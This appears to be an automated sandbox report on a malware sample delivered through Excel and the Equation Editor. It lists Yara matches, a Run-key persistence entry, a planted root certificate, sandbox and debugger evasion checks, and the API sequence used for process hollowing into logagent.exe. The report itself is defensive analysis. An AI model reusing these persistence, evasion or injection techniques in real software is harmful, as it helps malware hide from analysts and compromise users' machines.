Source: Yara match File source: 8.3.Esfjmbxd.exe.1d42094.286.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d20b08.34.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d42094.284.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.vbc.exe.1ea1ef4.278.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Esfjmbxd.exe.1d8d598.275.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41774.249.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Esfjmbxd.exe.1d8d594.280.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.Esfjmbxd.exe.1d2d734.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3d60c.102.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d3d0a8.94.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41324.241.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d2d594.279.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.Esfjmbxd.exe.1d41520.48.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Esfjmbxd.exe.1d8d734.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.544671819.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566665565.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525659304.0000000001E8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566085923.0000000001DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544180474.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566289908.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482158842.0000000001EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566501613.0000000001DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.603310457.0000000001D2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480503780.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566202052.0000000001D8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479950965.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566715665.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544264946.0000000001D2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480681894.0000000001E8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566148762.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544497330.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566552143.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544614514.0000000001D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480350918.0000000001E8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544308555.0000000001D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544544050.0000000001D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566595226.0000000001D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.481290433.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544115744.0000000001D44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544390642.0000000001D2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482088353.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482210070.0000000001E7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.479891596.0000000001EA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.642465080.0000000001D8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.480431968.0000000001EA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544431863.0000000001D44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.544350421.0000000001D1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566373519.0000000001D7C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.566438198.0000000001D8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.481026953.0000000001EA4000.00000004.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C push 0043DDF9h; ret 4_2_0043DDF1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00458108 push 00458140h; ret 4_2_00458138
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A1F4 push 0042A220h; ret 4_2_0042A218
Source: C:\Users\Public\vbc.exe Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx 4_2_004201FD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00458180 push 004581ACh; ret 4_2_004581A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A1AC push 0042A1EAh; ret 4_2_0042A1E2
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A1B4 push 0045A427h; ret 4_2_0045A41F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A22C push 0042A264h; ret 4_2_0042A25C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C294 push 0042C2D7h; ret 4_2_0042C2CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406340 push 00406391h; ret 4_2_00406389
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C30C push 0042C338h; ret 4_2_0042C330
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428448 push 00428518h; ret 4_2_00428510
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A550 push 0042A57Ch; ret 4_2_0042A574
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E5F8 push 0040E624h; ret 4_2_0040E61C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406588 push 004065B4h; ret 4_2_004065AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406600 push 0040662Ch; ret 4_2_00406624
Source: C:\Users\Public\vbc.exe Code function: 4_2_00414628 push ecx; mov dword ptr [esp], eax 4_2_0041462B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428628 push 00428654h; ret 4_2_0042864C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A6FC push 0042A728h; ret 4_2_0042A720
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx 4_2_0041C6A6
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440764 push 00440790h; ret 4_2_00440788
Source: C:\Users\Public\vbc.exe Code function: 4_2_004547B8 push 004547F0h; ret 4_2_004547E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004288FC push 00428928h; ret 4_2_00428920
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A958 push 0045A984h; ret 4_2_0045A97C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C918 push 0042C971h; ret 4_2_0042C969
Source: C:\Users\Public\vbc.exe Code function: 4_2_004289F8 push 00428A24h; ret 4_2_00428A1C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C9FF pushfd ; retf 0041h 4_2_0041CA51
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A990 push 0045A9B6h; ret 4_2_0045A9AE
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C9B4 push 0042C9ECh; ret 4_2_0042C9E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042CA48 push 0042CA74h; ret 4_2_0042CA6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx 4_2_0043EAA0
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00459820 LoadLibraryA,GetProcAddress, 4_2_00459820

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Esfjmbxd.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Esfjmbxd.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Esfjmbxd.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Esfjmbxd Jump to behavior
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Esfjmbxd Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_00451054
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_0044E03C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_004389E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 4_2_00428C3C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_00439260
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 8_2_00451054
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 8_2_0044E03C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0043812C IsIconic,GetCapture, 8_2_0043812C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 8_2_004389E0
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 8_2_00428C3C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 8_2_00439260
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 8_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 8_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 11_2_00451054
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 11_2_0044E03C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0043812C IsIconic,GetCapture, 11_2_0043812C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 11_2_004389E0
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 11_2_00428C3C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 11_2_00439260
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 11_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 11_2_00451820
Stores large binary data to the registry
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A8F4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_0042A8F4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 000000007248898E second address: 0000000072488994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000000C8604 second address: 00000000000C860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000000C898E second address: 00000000000C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D734 4_2_0042D734
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0042D734 8_2_0042D734
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0042D734 11_2_0042D734
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1232 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1940 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe TID: 2256 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe TID: 1892 Thread sleep time: -240000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D734 4_2_0042D734
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0042D734 11_2_0042D734
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\Public\vbc.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 4_2_004505B0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 8_2_004505B0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 11_2_004505B0
Source: C:\Windows\SysWOW64\logagent.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_004244DC GetSystemInfo, 4_2_004244DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_004057AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F7DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 4_2_042F7DE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F56C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_042F56C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A27DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 8_2_03A27DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A256C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_03A256C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C17DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 11_2_03C17DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C156C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_03C156C4

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00459820 LoadLibraryA,GetProcAddress, 4_2_00459820
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020826F8 mov eax, dword ptr fs:[00000030h] 6_2_020826F8
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8
Enables debug privileges
Source: C:\Windows\SysWOW64\logagent.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_02070048

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 80000 protect: page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 90000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 80000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 90000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: A0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: B0000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\Public\vbc.exe Code function: 4_2_042FCE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 4_2_042FCE34
Creates a thread in another existing process (thread injection)
Source: C:\Users\Public\vbc.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 90000 Jump to behavior
Source: C:\Users\user\Esfjmbxd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 90000 Jump to behavior
